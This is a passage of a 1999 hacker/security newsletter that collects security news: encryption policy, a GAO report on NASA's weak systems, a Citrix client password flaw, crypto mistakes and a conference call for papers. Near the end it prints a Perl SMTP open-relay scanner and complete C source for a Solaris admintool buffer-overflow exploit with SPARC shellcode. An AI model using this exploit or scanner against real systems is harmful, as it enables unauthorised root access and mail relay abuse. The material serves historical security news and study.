said. As the silence turned to laughter, Reinsch tried to backtrack,
blurting, "I didn't say that."
But it was enough to silence Representative Bradley J. Sherman. Sherman
promptly ended his grilling of Reinsch, who along with representatives of
the National Security Agency and the Federal Bureau of Investigation, was
testifying in defense of the Administration's encryption policy. The
Administration has tied any loosening of export controls on strong
encryption to the development of technology that would guarantee law
enforcement easy access to criminals' communications.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
36.0 [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:03:24 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
Forwarded From: "Rob Slade" <rslade@sprint.ca>
BKWNTSAC.RVW 990409
"Microsoft Windows NT 4.0 Security, Audit, and Control", James G.
Jumes et al, 1999, 1-57231-818-X, U$49.99/C$71.99/UK#45.99
%A James G. Jumes
%A Neil F. Cooper
%A Paula Chamoun
%A Todd M. Feinman
%C 1 Microsoft Way, Redmond, WA 98052-6399
%D 1999
%G 1-57231-818-X
%I Microsoft Press
%O U$49.99/C$71.99/UK#45.99 800-6777377 fax: 206-936-7329
%P 318 p.
%S Technical Reference
%T "Microsoft Windows NT 4.0 Security, Audit, and Control"
The primary audience described in the introduction seems to be security
professionals. However, system administrators, technology managers, and
CIOs are mentioned as well. The attempt at breadth of coverage usually
does not bode well in works like these.
Chapter one discusses an information security model based upon the
business (and other) objectives of the institution in question. While
valid as far as it goes, and even possibly helpful when formulating
security policy, this by no means provides a structure from which to view
either security policy or procedures, let alone implement a complex set of
controls. The widget company, beloved of management writers, is described
in chapter two. For the purposes of assessing security in real world
working environments, this particular widget company seems to be
astoundingly simple and homogeneous.
Chapter three starts out talking reasonably about security policy, starts
to get flaky in risk assessment (I would definitely worry about a .45
chance of an earthquake), and tails off into trivia. Monitoring, in
chapter four, looks first at system performance and diagnostics, and then
gets into event logging without really going into the concepts. Many
areas of physical security are left uncovered in chapter five. Chapter
six discusses domains, trust relationships, and remote access permissions.
Dialogue boxes for user accounts and groups are listed in chapter seven.
There is some mention of the commonly "received wisdom" in regard to these
topics, as there is in chapter eight regarding account policies, but
nothing very significant. File system, share, and other resource control
is covered in chapter nine. Chapter ten is a bit of a grab bag without
much focus. The registry is reviewed in chapter eleven. Chapter twelve
looks briefly at power supplies and backups. Although it talks about
auditing, chapter thirteen is more of a checklist of security features to
think about. Appendix A is a bit better in this regard: it lists
recommended settings across a number of functions for six different types
of systems.
There is some discussion of options as the various functions are
addressed, so, in a sense, this is a start towards full coverage of NT
security. It has a long way to go, though. In addition, the deliberation
comes at the cost of a loss of some detail in terms of security
implementation.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
37.0 [ISN] LCI Intros SMARTpen Biometric Signature Authentication
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 01:22:36 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] LCI Intros SMARTpen Biometric Signature Authentication
Forwarded From: 7Pillars Partners <partners@sirius.infonex.com>
LCI Intros SMARTpen Biometric Signature Authentication
S'HERTGENBOSCH, NETHERLANDS, 1999 MAY 24 (NB)
By Sylvia Dennis, Newsbytes.
LCI Technology has taken the wraps off its SMARTpen biometric signature
authentication system. The SMARTpen is billed as the world's first
wireless signature device and the only biometric unit of its type that
writes on normal paper.Sam Asseer, the firm's chairman, said that the unit
was designed for high-end security transactions. It is, he explained, a
wireless embedded computer system that looks and writes like a common
ballpoint pen.
In use, the SMARTpen uses built-in sensors that enable the authentication
of users through the biometric characteristics of their signatures on
regular paper.
"Electronic commerce is rapidly becoming the way the world does business,"
he said, adding that the surge in online transactions over the past two
years and the predictions for explosive growth going into the year 2000
suggests that the future of e-commerce is unlimited.
"But, as the number of Internet transactions increases, there is an even
greater demand for security to ensure confidentiality and prevent fraud.
Biometric authentication systems like the LCI SMARTpen help create the
secure environment necessary for the continued expansion of global
e-commerce," he said.
According to the firm, the SMARTpen measures individual signature
characteristics, encrypts the data and transmits it via radio frequency to
a computer, where LCI software compares it to a template for verification
- all in about three seconds.
The firm claims that the dynamics of signatures as measured by the
SMARTpen are personal and not directly visible from the written image.
This, the firm says, makes it virtually impossible for forged signatures
to get through the SMARTpen system. The system works with standard APIs
(application programming interfaces) and the false rejection/false
acceptance rate can be adjusted by system parameters, so adding
flexibility.
Pricing on the SMARTpen is expected to range from $100 to $250, depending
on the model and configuration of the product.
According to LCI, the price includes the pen and software components. The
SMARTpen also has integral sensors, a mouse, a digital signal processor,
radio transmitter and receiver, and encryption system.
LCI's Web site is at http://www.smartpen.net .
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
38.0 [ISN] CFP: DISC 99 Computer Security 99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 02:31:07 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] CFP: DISC 99 Computer Security 99
Forwarded From: Juan Carlos Guel Lopez <cguel@martini.super.unam.mx>
.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
____ ___ ____ ____ ___ ___
| _ \_ _/ ___| / ___| / _ \ / _ \
| | | | |\___ \| | | (_) | (_) |
| |_| | | ___) | |___ \__, |\__, |
|____/___|____/ \____| /_/ /_/
C o m p u t e r S e c u r i t y 9 9
"Working Together"
October 4-8, 1999
Palacio de Miner'ia, M'exico City, M'exico.
.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
C A L L F O R P A R T I C I P A T I O N
The goal of Computer Security 99 (DISC 99) is to create awareness in
the computer user community about security strategies and mechanisms
used to protect information.
For the second consecutive year the DISC takes place alongside the
most important computing event of Mexico, the computing general
congress Computo.99@mx (http://www.computo99.unam.mx/), and invites
specialists in computer security to participate.
"Working Together" is the slogan for this year's event, suggesting
that security in the organization can only exist and be increased with
the work of all the people in the organization, including users,
management and security personnel.
The community is invited to participate in the DISC 99 event through
the presentation of theoretical, technical, and applied works and
those who presents practical experience in the following topics (but
not limited to them):
@ > Electronic commerce
- Certification
- Digital cash
- New protocols
- Secure transactions
@ > New Firewall technologies
@ > World Wide Web security
- Secure Sockets Layer (SSL)
@ > Network security
@ > Security for software developers
@ > Security in distributed systems and data bases
@ > Security in agents and multi-platform languages
@ > Incident response teams
@ > Computer security incident handling, prevention and coordination
@ > Administrative and legal issues in the incident handling
@ > Software protection and intellectual property
@ > New tools for incident handling
@ > Attacks and intrusion detection
@ > Computer attacks
@ > Privacy and cryptography protocols
@ > Security policies
.......................
Who should attend ?
.......................
* System administrators who are interested in Computer
Security.
* People working in the field of Computer Security,
and handling Computer Security incidents.
* Anybody who is interested in Computer Security and wants to
meet another interested people. This event will help him or
her to improve security programs, security plans, and
security tools by sharing and getting a wide experience and
knowledge.
* People who want to establish incident response teams.
* Anybody who has a particular interest in network security,
monitoring tools, intrusion detection and firewalls.
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Important Dates
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Paper submissions: July 2
Acceptance notification: August 6
Final papers due: August 20
Event Dates: October 4-8
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Workshop Format
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
There will be tutorial-style presentations during October 4 and 5.
October 6, 7 and 8 will consist of conference papers and workshop-style
presentations, as well as business sessions.
Two evenings are allocated for participants to hold events devoted to
subjects of particular interest ("birds of a feather" sessions).
Contributions should follow the following guidelines:
1. Tutorials: Half or full day tutorial proposals will be
considered.
2. Papers: Written papers may be as long as desired, but
presentations must be limited to 30 minutes.
3. Workshops: These informal sessions should either follow a more
"hands-on" approach or provide for a high degree of
audience participation. They should be tailored to
address specific issues and should be from 60 to 90
minutes in duration. Panel Sessions on a particular
topic are also acceptable.
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Instruction for authors
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
We will receive proposals for presentations, workshops and tutorials
that follow these guidelines:
* The documents should be delivered by the indicated date.
* The contents of the documents should be high-quality and
original. It should also include an abstract that describes
the content and style of the presentation.
* The papers will be evaluated using the proposal, which has
to contain:
- title
- format (workshop, tutorials or conference)
- extended abstract (more than one but less than two pages)
- requirements for the presentation (computing
equipment, data projector, slide projector, etc.)
- author information
- name
- address and affiliation
- brief resume
- fax and telephone number
- e-mail address
* For tutorials, the following information should also be
included:
- goal
- introduction and summary
- outline of the presentation
- duration (half or full day)
- presentation material (slides)
....................
Accepted formats
....................
Authors whose papers are accepted must submit the complete paper to be
include into the C'omputo.99@mx proceedings.
Submissions will be accepted in the following formats:
- TeX/LaTeX
- PostScript
- Word for Windows
- ASCII
- Please contact the committee (disc99@asc.unam.mx) if
you need to use a different format.
Note: The specifications of the papers such as margins, font size and
line spacing will be specified in the DISC 99 WWW page at:
http://www.asc.unam.mx/disc99-i/convocatoria.html
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Program Committee
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
President:
-> Dr. Enrique Daltabuit
Centro Tecnologico, ENEP-Aragon, UNAM
-> M. en C. Diego Zamboni
CERIAS, Purdue University
-> Nicholas P. Cardo
Lawrence Berkeley National Laboratory
Computational Systems Group
...............
Submissions
...............
Presentations can be delivered using the following means:
o E-mail (disc99@asc.unam.mx)
o Post mail to the following address:
Area de Seguridad en C'omputo
Direcci'on General de C'omputo Acad'emico
Circuito Exterior, Ciudad Universitaria
04510 M'exico, D.F.
MEXICO
<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
Further Information
-------------------
E-mail : disc99@asc.unam.mx
WWW : http://www.asc.unam.mx/disc99-i/convocatoria.html
Address :
'Area de Seguridad en C'omputo
Direcci'on General de C'omputo Acad'emico
Circuito Exterior, Ciudad Universitaria
04510 Mexico, D.F.
MEXICO
Telephone Number : (52-5) 622 81 69 and (52-5) 685 22 29
Fax : (52 5) 6 22 80 43
Subject: DISC 99
<>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
39.0 [ISN] GAO: NASA systems full of holes.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 02:56:28 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] GAO: NASA systems full of holes.
From: anon
http://www.fcw.com/pubs/fcw/1999/0524/fcw-newsnasa-5-24-99.html
MAY 24, 1999
GAO: NASA systems full of holes
BY DIANE FRANK (diane_frank@fcw.com)
Out-of-date information security policies have left significant
vulnerabilities in NASA's mission-critical systems that could allow
unauthorized users to steal, modify or delete important operational data,
according to a General Accounting Office report released last week.
GAO, working over the past year with experts from the National Security
Agency and using nothing more than public Internet access, was able to
gain access to several unclassified mission-critical systems, including
those supporting the command and control of spacecraft.
According to GAO, NASA has not created enough awareness among its
employees about common security mistakes and vulnerabilities, such as
easily guessed passwords. NSA initially breached some systems using
passwords such as "guest" for guest accounts and "adm" for system
administrators, opening the door for broader access to agency systems.
"The way we got in was through commonly known security faults," said John
de Ferrari, assistant director of the Accounting and Information
Management Division at GAO.
GAO concluded that it was able to penetrate systems because NASA does not
have a consistent information security management policy that the entire
agency follows. "A lot of what needs to be done is awareness-related; you
never seem to get enough awareness of computer security," de Ferrari said.
GAO found that NASA did not have many policies regarding Internet and
network security, and some policies the agency did have were out of date
or were not followed.
"We Had Become Quite Lax" "The fact of the matter is, we had become quite
lax in the agency in terms of passwords," said Lee Holcomb, NASA's chief
information officer. NASA now is scanning user passwords for ones that
could be easily cracked and to check new passwords for vulnerabilities.
"We take very seriously our responsibility for safeguarding our IT assets,
and after Y2K, security is our No. 1 priority," Holcomb said. "They
acknowledge that they did not succeed in penetrating several systems, but
the fact that they did succeed is troubling to us. It is a wake-up call to
the agency."
This report is an important addition to the work already occurring
throughout government to raise awareness of security needs, said Paul
Rodgers, senior executive at the Critical Infrastructure Assurance Office,
which is leading the national effort to protect critical systems. "The
dangers are increasing, and we think the GAO report delivers an important
message to NASA and other agencies," Rodgers said.
The GAO/NSA team could not penetrate certain pockets of NASA's systems
because network administrators either carefully controlled system access
privileges or used patches for known operating system flaws. If expanded
to the whole agency, such simple fixes could protect systems better
because hackers usually will move on to systems with easily exploitable
weaknesses, de Ferrari said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
39.1 [ISN] Nasa vulnerabilities potentially deadly
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 01:12:31 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] NASA Vulnerabilities Are Potentially Deadly
http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
NASA Leakage -- Deadly Leakage
By MIKE HUDACK
135 out of 155 NASA computer systems were found vulnerable by NSA hackers,
reported the General Accounting Office. The GAO, however, didn´t say what
was contained on those systems -- they simply called them "mission
critical." The fact is, however, that there´s a lot more to these
systems than NASA missions.
"[Some NASA software has] the functionality of serving in the capacity of
a munition's guidance system," said an anonymous source inside NASA. The
weight of such a statement is quite obvious. "The software, however,
would require a certain amount of modification and adaptation to
accommodate the purpose [of nuclear weapons guidance]," the source
continued.
The pattern is clear: earlier this year, the world learned of espionage at
Department of Energy laboratories in which neutron bomb technology was
stolen. At this point, there is no evidence that guidance technology from
NASA computers has been stolen. The fact remains, however, that China has
a dedicated force of computer hackers who do nothing but probe US
Government computers. Their missing NASA would be extraordinarily
unlikely.
The most damning evidence, reported by two anonymous NASA employees,
states that NASA has known about security holes in its Information
Technology facilities for more than a year. According to them, "Security
has consistently been reduced to a reactive role in every part of the
agency. [IT] which has long been identified as vulnerable is not
prohibited." In fact, one went so far as to suggest that it would take a
fundamental change of NASA leadership to create any true security at the
Agency.
Continued at:
http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
40.0 Citrux Winframe client for Linux vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 12:26:59 -0700
From: David Terrell <dbt@meat.net>
To: BUGTRAQ@netspace.org
Subject: Citrix Winframe client for Linux
[ presumably this holds true for the other unix clients as well, but
all I have is linux to test on ]
The Citrix Winframe linux client (used for accessing Winframe and
Windows NT Server Terminal Edition) has a simple configuration section.
Perhaps too simple.... All configuration information is stored in a
directory /usr/lib/ICAClient/config which is mode 777. This in and
of itself is bad news, since any user on the system can overwrite
configuration data.
The situation is actually much worse than that.
When you start up the actual session manager (wfcmgr) you get a listbox
of configured sessions. The data for this listbox is stored in the mode
777 file /usr/lib/ICAClient/config/appsrv.ini. So there's a single
config file shared between all users. A sample session profile follows:
[WFClient]
Version=1
[ApplicationServers]
broken=
[broken]
WinStationDriver=ICA 3.0
TransportDriver=TCP/IP
DesiredColor=2
Password=0006f6c601930785
Domain=NTDOM
Username=user
Address=hostname
Yep. Passwords are stored in some kind of hash. What that hash is doesn't
really matter since you can just bring up wfcmgr and log in as that user.
Terrible.
I tried mailing both support@citrix.com and security@citrix.com but
neither of these addresses exist.
Workaround? wfcmgr supports the -icaroot parameter, but you basically
need to copy all the files in for it to work. So duplicate the tree in
your home directory, fix permissions, and do wfcmgr -icaroot $HOME/.ica.
Alternatively, don't use it.
Distressing that the company that was "bringing multiuser concurrent logons
to Windows NT" makes such a little effort at understanding multiuser
security.... [further editorialization left to the reader]
--
David Terrell
dbt@meat.net, dbt@nebcorp.com I may or may not be speaking for Nebcorp,
http://wwn.nebcorp.com/~dbt/ but Nebcorp has spoken for you.
@HWA
41.0 [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 28 May 1999 20:16:42 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
Message-ID: <Pine.SUN.3.96.990528201424.23867K-100000@flatland.dimensional.com>
[Very good run-down on what isn't acceptable crypto. - Jay]
Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
Originally From: "Arnold G. Reinhold" <reinhold@world.std.com>
Courtesy of Cryptography List.
At 1:36 PM -0400 5/27/99, Kawika Daguio wrote:
What I would like to know from you is whether you and others have been
able to construct a "duh" list of typical, but unacceptable current
practices that can easily be remediated.
Here are my top 10 candidates for a "duh" list:
1. Keys that are too short: Anything less than 80 bits for symmetric
ciphers (128-bits prefered), or 1024 bits for integer-based public key
systems. In particular this precludes use of 56-bit DES. (112-bit 3DES is
fine.)
2. Poor quality random number generation. Random quantities are needed at
many places in the operation of a modern cryptographic security system. If
the source of randomness is weak, the entire system can be compromised.
3. Use of short passwords or weak passphrases to protect private keys or,
worse, using them to generate symmetric keys. Bad passphrase advice
abounds. For example, both Netscape and Microsoft advise using short
passwords to protect private keys stored by their browsers. The simple fix
is to use randomly generated passphrases of sufficient length. See
http://www.hayom.com/diceware.html.
4. Re-use of the same key with a stream cipher. I have seen this done many
times with RC4. Even Microsoft appears to have gotten this wrong with
their VPN (I do not know if it has been fixed). There are simple
techniques to avoid this problem but they are often ignored. See
http://ciphersaber.gurus.com for one method. The potential for slipping up
in stream cipher implimentation makes a strong case for using modern block
ciphers wherever possible.
5. Using systems based on encryption techniques that have not been
publically disclosed and reviewed. There are more than enough ciphers and
public key systems out there that have undergone public scrutiny. Many of
the best are now in the public domain: 3DES, Blowfish, Skipjack, Arcfour,
D-H, DSA. Others, e.g. RSA, IDEA can be licensed.
6. Ignoring physical security requirements for high value keys. In
particular, no secret key is safe if it is used on a personal computer to
which someone who is not trusted can gain physical access.
7. Lack of thorough configuration management for cryptographic software.
The best software in the world won't protect you if you cannot guarantee
that the version you approved is the version being executed.
8. Poor human interface design. Cryptographic systems that are too hard to
use will be ignored, sabotaged or bypassed. Training helps, but cannot
overcome a bad design.
9. Failure to motivate key employees. Action or inaction, deliberate of
inadvertent, by trusted individuals can render any security system worse
than worthless. David Kahn once commented that no nation's communications
are safe as long as their code clerks are at the bottom of the pay scale.
10. Listening to salesmen. Any company that is selling cryptographic
products has a good story for why the holes in their product really do not
matter. Make sure the system you deploy is reviewed by independent
experts.
Arnold Reinhold
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
42.0 Seeing invisible fields and avoiding them...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Twstdpair (Source: MSNBC)
See invisible fields - and avoid them
The Micro Alert Alarm for detecting
radio/microwaves
May 28 - Earlier this week, a news story I read troubled me greatly. It told about a
European study that linked cellular phone use to an increased incidence of brain
tumors. For me, and millions of other cell phone junkies, this is a very scary thought.
If the study is true, I could stop using my phones to minimize risks, or find out just
how much "pollution" my devices are creating. THAT'S WHERE THE PEOPLE from AlphaLab Inc.
come in. Someone there read a column I did on a cell phone antenna add-on that claimed
to take the signal and move it away from your head. AlphaLab's David told me the company
made a tiny device that could detect what your phone was really doing. I jumped at
the chance to play with one.
The Micro Alert Alarm is just what it says it is. It's a matchbox-sized device(2.25 inches
by 1.6 inches by 0.75inches) that will (and I quote) "find what's emitting radio or
microwaves,whether in hidden locations or in plainsight." The alarm puts forth a loud
(annoying) beep when radio waves stronger than the level you select are present. If you
move closer to the source of the RF-emitting device, the beeps will ultimately become a
solid tone (more annoying). As you move away from the source, the beeping will stop
altogether (thankfully).
The alarm runs on a tiny battery that lasts three years or so. At its highest
sensitivity, it should detect a typical cellular phone tower a half-mile away. Or an
analog cellular phone 40 feet away. Or a digital phone at 20 feet. Or a microwave oven
that's in use 10 to 50 feet away. To send the Micro Alert Alarm into nearly constant fits,
unscrew the back and open one side. The sensitivity goes off the chart. In that mode, you
can see if someone has bugged a room (anong other things). The price for this little
marvel? $81.50, plus shipping and handling.
Does it work? You bet. Actually, sometimes it works too well. The most important part of
working this device is setting it to your location. It can be very sensitive. I really
couldn't test it at MSNBC. Way too many TV monitors, computer monitors and all sorts of
broadcasting stuff around. And I couldn't really test it at home in Lower Manhattan. An
old friend, Joe Sand, while helping me install an antenna on my roof, told me I lived
so close to the broadcast antennas on the World Trade Center, that if someone made
sunglasses that detected radio waves, it would look as if I lived inside a tornado. He
was right. The alarm was nearly impossible to adjust at the "normal" setting. And it
never stopped beeping when set on "high" sensitivity. I did have better luck out at the
Eastern Long Island test center. There I was able to adjust everything to my liking. I
found that the Micro Alert Alarm didn't like microwave ovens or TV sets or computer
monitors - all from a few feet away. Cellular phones (one-third-watt output) set off the
beeping from about three to five feet away and my Blackberry beeper (2 watts of
transmitting power) did the same from about one to two feet away. Not what AlphaLab
claims, but who knows if I ever really maximized all the settings. Is it worth it? That
depends. If you're the paranoid type, buy one today. I couldn't reference just how
scientifically accurate it is, but under favorable conditions it did detect
those invisible radio waves that could be dangerous to our health. Might turn out to be a
good gift for someone with a pacemaker. On the other hand, a Micro Alert Alarm is said to
find surveillance "bugs," detect police radar, leaky microwave ovens, fluorescent
lighting, electric typewriters and copy machines! Finally, you can take AlphaLab's
advice and switch on your Micro Alert Alarm and put it in your pocket when you go out.
If someone switches on a cell phone and sets off your alarm, you can kindly ask them
to move away and stop polluting your personal space. Cool!
@HWA
43.0 RelayCheck v1.0 scan for smtp servers that will relay mail.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
#!/usr/bin/perl
##############################################
# #
# RelayCheck v1.0 #
# Written By: Epicurus (epicurus@wilter.com) #
# #
# Purpose: To scan a list of SMTP servers to #
# find servers that will relay e-mail. There #
# are many reasons why one might need such a #
# list of SMTP servers. #
# #
# Usage: #
# Create a list of hosts which you want to #
# scan. One host per line. Then run this #
# script. #
# #
##############################################
use Socket;
print "RelayCheck v1.0\n";
print "Written By: Epicurus (epicurus\@wilter.com)\n\n";
print "Host List: ";
chomp($host_list=<STDIN>);
print "HELO Domain: ";
chomp($helo_domain=<STDIN>);
print "Attempt From: ";
chomp($from=<STDIN>);
print "Attempt To: ";
chomp($to=<STDIN>);
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i)
{
$log = 1;
$logfile="relay.log";
print "Log File [$logfile]: ";
$file=<STDIN>;
chop($file) if $file =~ /\n$/;
if($file ne "")
{
$logfile=$file;
}
open(LOG,">>$logfile") || die("Unable to write to $logfile!");
print LOG "RelayCheck Scan:\n\n";
}
##############################################
$helo_string = "HELO $helo_domain\r\n";
$mail_from = "MAIL FROM: <$from>\r\n";
$rcpt_to = "RCPT TO: <$to>\r\n";
$port = 25;
$found=0;
$i=0;
open(HOSTS,"$host_list") || die $!;
while(<HOSTS>)
{
chop($_) if $_ =~ /\n$/;
$remote=$_;
$print_remote = $remote;
$print_remote .= "." while(length($print_remote) < 38);
$print_remote .= ": ";
print "$print_remote";
print LOG "$print_remote" if($log==1);
&send_mail;
$i++;
}
close(HOSTS);
print "\nFinished Scanning. $found out of $i hosts will relay.\n\n";
print LOG "\nFinished Scanning. $found out of $i hosts will relay.\n\n" if($log==1);
close(LOG);
sub send_mail
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
$smtp=<SOCK>;
if($smtp =~ /^220 /)
{
send(SOCK,$helo_string,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
send(SOCK,$mail_from,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
send(SOCK,$rcpt_to,0);
}
$smtp=<SOCK>;
if($smtp =~ /^250 /)
{
$found++;
print "relaying allowed\n";
print LOG "relaying allowed\n" if($log==1);
}
else
{
print "no relaying\n";
print LOG "no relaying\n" if($log==1);
}
send(SOCK,"QUIT\r\n",0);
close(SOCK);
}
@HWA
44.0 Admintool exploit for Solaris (Updated) by Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
/*=============================================================================
admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY=yourdisplay:0.0
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#include <sys/utsname.h>
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i,vofs=0;
struct utsname name;
main()
{
uname(&name);
if (strcmp(name.release,"5.7")==0) vofs=-904;
system(PKGDIR);
putenv("LANG=");
if ((fp=fopen(PKGMAP,"wb"))==NULL){
printf("Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);
if ((fp=fopen(PKGINFO,"wb"))==NULL){
printf("Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"PKG=");
ret_adr=get_sp()-OFFSET+vofs;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;
printf("Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"VERSION=1.00\n");
fprintf(fp,"ARCH=sparc\n");
fprintf(fp,"CLASSES=none\n");
fprintf(fp,"CATEGORY=application\n");
fprintf(fp,"PSTAMP=990721\n");
fprintf(fp,"BASEDIR=/\n");
fclose(fp);
system("admintool");
}
@HWA
45.0 AppManager 2.0 for NT from NetIQ displays passwords in cleartext
